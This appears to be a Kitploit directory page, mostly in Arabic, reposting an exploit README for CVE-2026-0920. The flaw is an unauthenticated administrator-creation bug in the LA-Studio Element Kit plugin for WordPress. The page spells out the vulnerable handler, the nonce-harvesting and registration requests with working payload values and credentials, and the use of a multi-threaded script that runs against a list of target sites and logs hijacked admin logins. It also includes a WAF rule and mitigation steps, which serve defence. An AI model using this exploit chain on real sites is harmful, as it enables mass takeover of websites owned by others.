Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-0920- — LA-Studio Element Kit لـ Elementor <= 1.5.6.3 - تصعيد امتيازات دون مصادقة عبر باب خلفي لإنشاء مستخدم إداري عبر معامل lakit_bkrole | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2026-0920-
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبالتعلم والتعليم
GitHubnxploited/cve-2026-0920-

CVE-2026-0920-

LA-Studio Element Kit لـ Elementor <= 1.5.6.3 - تصعيد امتيازات دون مصادقة عبر باب خلفي لإنشاء مستخدم إداري عبر معامل lakit_bkrole

عرض المستودع
21منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-0920-

LA-Studio Element Kit for Elementor <= 1.5.6.3 - تصعيد صلاحيات غير مصادق عليه عبر باب خلفي لإنشاء مستخدم إداري عبر معامل lakit_bkrole

root@kitploit:~
   _____   _____   ___ __ ___  __      __  ___ ___ __  
  / __\ \ / / __|_|_  )  \_  )/ / ___ /  \/ _ \_  )  \ 
 | (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
  \___| \_/ |___| /___\__/___\___/    \__/ /_//___\__/ 

Telegram CVE CVSS Python License


📡 الاستغلال يُنشر هنا أولاً. تابع @KNxploited على تيليغرام — مصدرك النخبوي لأحدث ثغرات CVE المُعلنة، ونماذج الإثبات (PoCs) الجاهزة، وأبحاث أمنية دقيقة. يُحدَّث باستمرار. صُمم لمن يبقون في المقدمة.


🧠 نظرة عامة

CVE-2026-0920 هي ثغرة حرجة بدرجة 9.8 وفق CVSS اكتُشفت في ملحق ووردبريس LA-Studio Element Kit for Elementor.

يقع الخلل في دالة ajax_register_handle()، التي تعالج تسجيلات المستخدمين غير المصادَق عليهم عبر AJAX. تفشل الدالة في فرض أي قيد على معامل lakit_bkrole — مما يسمح لمهاجم غير مصادق تمامًا بإسناد دور administrator لنفسه أثناء التسجيل، محققًا السيطرة الكاملة على لوحة تحكم ووردبريس من طلب واحد.


💀 الغوص في تفاصيل الثغرة

السبب الجذري هو غياب فحص صلاحيات الدور داخل معالج تسجيل AJAX في الملحق:

root@kitploit:~
// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);

public function ajax_register_handle() {
    $actions = json_decode(stripslashes($_POST['actions']), true);

    foreach ($actions as $req) {
        if ($req['action'] === 'register') {
            $data = $req['data'];

            $user_data = [
                'user_login' => $data['username'],
                'user_pass'  => $data['password'],
                'user_email' => $data['email'],
                'role'       => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
            ];

            // No validation of $data['lakit_bkrole'] against allowed roles
            wp_insert_user($user_data); // Administrator created silently
        }
    }
}

لماذا هذا بالغ الخطورة؟

  • wp_ajax_nopriv_* = يمكن الوصول إليه من أي شخص دون أي مصادقة
  • lakit_bkrole يقبل أي سلسلة أدوار في ووردبريس — بما في ذلك administrator
  • طلب POST واحد ينشئ حساب مدير بصلاحيات كاملة
  • الـ nonce المطلوب مكشوف علنًا في HTML/JS بالواجهة الأمامية للموقع
  • لا يوجد تحديد لمعدل الطلبات، ولا CAPTCHA مفروض افتراضيًا، ولا تحقق مطلوب من البريد الإلكتروني

⚔️ سلسلة الاستغلال

root@kitploit:~
Step 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)

Search HTML/JS for:
  "ajaxNonce": "<value>"         ← Inline JSON config
  ajaxNonce: '<value>'           ← JS variable
  data-ajaxnonce="<value>"       ← HTML attribute

Nonce is publicly accessible — no login required.
  ↓
ajaxNonce extracted ✔️

──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php

  action  = lakit_ajax
  _nonce  = <extracted nonce>
  actions = {
    "req1": {
      "action": "register",
      "data": {
        "email":                  "[email protected]",
        "password":               "adminSA",
        "username":               "Nx_admin",
        "lakit_field_log":        "yes",   ← use supplied username
        "lakit_field_pwd":        "yes",   ← use supplied password
        "lakit_field_cpwd":       "no",    ← skip password confirm
        "lakit_bkrole":           "1",     ← trigger admin role injection
        "lakit_recaptcha_response": ""
      }
    }
  }
  ↓
Administrator account silently created ✔️

──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
  log = Nx_admin
  pwd = adminSA
  ↓
Session cookies obtained → GET /wp-admin/plugin-install.php
  ↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️

⚙️ المتطلبات

root@kitploit:~
pip install requests colorama
الاعتمادالغرض
requestsطلبات HTTP، إدارة الجلسات، التعامل مع الكوكيز
coloramaمخرجات طرفية ملونة على جميع المنصات

يُنصح باستخدام بايثون 3.10+ (يستخدم تلميحات أنواع str | None).


📂 بنية الملفات

root@kitploit:~
CVE-2026-0920/
├── CVE-2026-0920.py          # Main exploit script
├── list.txt                  # Target URLs — one per line
├── success_results.txt       # Auto-generated: pwned targets + credentials

🚀 الاستخدام

الخطوة 1 — ضبط بيانات الدخول (اختياري)

افتح CVE-2026-0920.py وعدّل الثوابت في الأعلى لضبط تفاصيل حساب المدير المطلوب:

root@kitploit:~
ADMIN_EMAIL    = "[email protected]"   # Email for the new admin account
ADMIN_PASSWORD = "adminSA"                 # Password for the new admin account
ADMIN_USERNAME = "Nx_admin"               # Username for the new admin account

الخطوة 2 — تجهيز الأهداف

أنشئ list.txt مع رابط هدف واحد في كل سطر:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com

الروابط بدون بروتوكول تُضاف إليها https:// تلقائيًا.


الخطوة 3 — تشغيل الاستغلال

root@kitploit:~
python CVE-2026-0920.py

سيُطلب منك:

root@kitploit:~
Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50):             20

الخطوة 4 — مراقبة المخرجات المباشرة

يُنتج السكربت مخرجات طرفية ملونة وفي الوقت الفعلي:

root@kitploit:~
[14:22:01] [*] https://target.com - Starting target
[14:22:02] [+] https://target.com - kay: a4f9c2b1e3
[14:22:02] [*] https://target.com - AJAX HTTP status: 200
[14:22:03] [+] https://target.com - AJAX response indicates success
[14:22:04] [*] https://target.com - Full admin verification: OK

============================================================
[ SUCCESS BLOCK ]
Site        : https://target.com
Result      : SUCCESS
AJAX OK     : YES
FULL ADMIN  : YES (login + plugin install access)
============================================================
اللونالمعنى

الخطوة 5 — مراجعة النتائج

تُكتب الاستغلالات الناجحة إلى success_results.txt:

root@kitploit:~
https://victim.com | USERNAME:Nx_admin | EMAIL:[email protected] | PASSWORD:adminSA | LOGIN:FULL_ADMIN_OK | RESP_SUCCESS:YES | NONCE:a4f9c2b1e3

كل سطر يحتوي الصورة الكاملة: الهدف، بيانات الدخول، حالة تسجيل الدخول، حالة استجابة AJAX، والـ nonce المستخدم.


🖥️ مرجع معاملات السكربت


🔬 منطق التحقق

ينفذ السكربت تحققًا من مرحلتين لاستبعاد النتائج الإيجابية الخاطئة:

root@kitploit:~
Stage 1 — AJAX Response Analysis
  Checks for success markers in the JSON response:
    • "created successfully"
    • "success":true
    • "type":"success"
    • "status":"success"

Stage 2 — Real Login + Plugin Install Access Test
  1. POST /wp-login.php with injected credentials
  2. GET /wp-admin/plugin-install.php
  3. Confirm 200 response + plugin upload form present
  4. Confirm no redirect back to wp-login.php

Only BOTH stages passing = TRUE SUCCESS reported

هذا يستبعد النتائج الإيجابية الخاطئة الناتجة عن مواقع تُرجع 200 OK على AJAX لكنها تفشل بصمت في التسجيل.


📊 توقيع الكشف

يولّد الاستغلال هذا النمط الشبكي المحدد — للمدافعين ومؤلفي جدران الحماية (WAF):

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=lakit_ajax&_nonce=<VALUE>&actions={"req1":{"action":"register","data":{...,"lakit_bkrole":"1",...}}}

قاعدة WAF / IDS (شبه كود):

root@kitploit:~
IF  request.method == POST
AND request.path   == "/wp-admin/admin-ajax.php"
AND request.body   CONTAINS "lakit_ajax"
AND request.body   CONTAINS "lakit_bkrole"
THEN BLOCK + ALERT (Privilege Escalation Attempt — CVE-2026-0920)

🛡️ التخفيف والمعالجة

إذا كنت مالك موقع، أو مطورًا، أو مدافعًا، فتصرف فورًا:

  • ✅ حدّث LA-Studio Element Kit for Elementor إلى إصدار أعلى من 1.5.6.3
  • ✅ عطّل واحذف الملحق حتى يتم تثبيت نسخة مصححة مؤكدة
  • ✅ دقق جميع حسابات مديري ووردبريس — وأزل أي إدخالات غير معروفة فورًا
  • ✅ فرض التحقق من صحة الأدوار على الخادم — لا تثق أبدًا بقيم الأدوار المقدمة من المستخدم دون فحص قائمة بيضاء
  • ✅ احظر طلبات POST غير المصادقة إلى admin-ajax.php التي تحتوي على lakit_bkrole على مستوى جدار الحماية (WAF)
  • ✅ راقب سجلات الخادم وووردبريس بحثًا عن استدعاءات إجراء AJAX الخاص بـ lakit_ajax
  • ✅ فعّل المصادقة الثنائية على جميع حسابات المديرين الحالية كإجراء احتوائي
  • ✅ راجع إرشادات Wordfence وطبق جميع خطوات التحصين الموصى بها

⚠️ إخلاء المسؤولية

root@kitploit:~
THIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.

By downloading, executing, or modifying this script, you explicitly agree:

  • You hold EXPLICIT, WRITTEN authorization from the owner of every
    target system you test. No exceptions. No grey areas.

  • You are operating within a formally scoped, authorized penetration
    testing engagement or a controlled lab environment.

  • You will NOT use this tool against any system, network, or
    infrastructure without documented legal permission.

  • Nxploited and all contributors bear ZERO liability for unauthorized
    use, data loss, system damage, legal proceedings, or criminal
    prosecution arising from the use of this tool.

Unauthorized use of this exploit constitutes a criminal offense under:
  — Computer Fraud and Abuse Act (CFAA), USA
  — Computer Misuse Act (CMA), UK
  — EU Directive 2013/40/EU on Attacks Against Information Systems
  — Saudi Arabia's Anti-Cyber Crime Law (No. M/17)
  — And all equivalent national and international cybercrime legislation.

USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.

👤 المؤلف

الاسم المستعارNxploited
تيليغرام@KNxploited
GitHubgithub.com/Nxploited

🔔 تابع @KNxploited على تيليغرام ثغرات CVE جديدة. استغلالات جاهزة. أبحاث معمقة في الثغرات. أول من يعرف. أول من يتحرك. لا تكن الأخير.


صُنع بدقة بواسطة Nxploited · لأغراض البحث الأمني المصرح به فقط · CVSS 9.8 حرجة
تنزيل الأداة
الحقلالتفاصيل
معرف CVECVE-2026-0920
الملحقLA-Studio Element Kit for Elementor
المعرّف (Slug)lakit / la-studio-element-kit-for-elementor
الإصدارات المتأثرةجميع الإصدارات حتى 1.5.6.3 شاملة
نوع الثغرةتصعيد صلاحيات غير مصادق عليه / إنشاء مدير
متجه الهجومشبكة — لا يتطلب مصادقة
درجة CVSS 3.19.8 حرجة
متجه CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
الأثرالسيطرة الكاملة على حساب مدير ووردبريس
الباحثNxploited
threadingمعالجة متزامنة لأهداف متعددة
reاستخراج الـ nonce من HTML/JS عبر التعبيرات النمطية
🔵 سماوي [*]
معلوماتي — خطوة قيد التنفيذ
🟢 أخضر [+]إشارة إيجابية — نجاح جزئي أو كامل
🟡 أصفر [!]تحذير — نتيجة غامضة تحتاج مراجعة
🔴 أحمر [-]فشل — الهدف غير قابل للاستغلال أو حدث خطأ
المعاملالافتراضيالوصف
ملف الأهدافlist.txtالملف الذي يحتوي روابط الأهداف
عدد الخيوط10 (الحد الأقصى: 50)العمال المتزامنون
ADMIN_EMAIL[email protected]البريد الإلكتروني لحساب المدير المُحقن
ADMIN_PASSWORDadminSAكلمة المرور لحساب المدير المُحقن
ADMIN_USERNAMENx_adminاسم المستخدم لحساب المدير المُحقن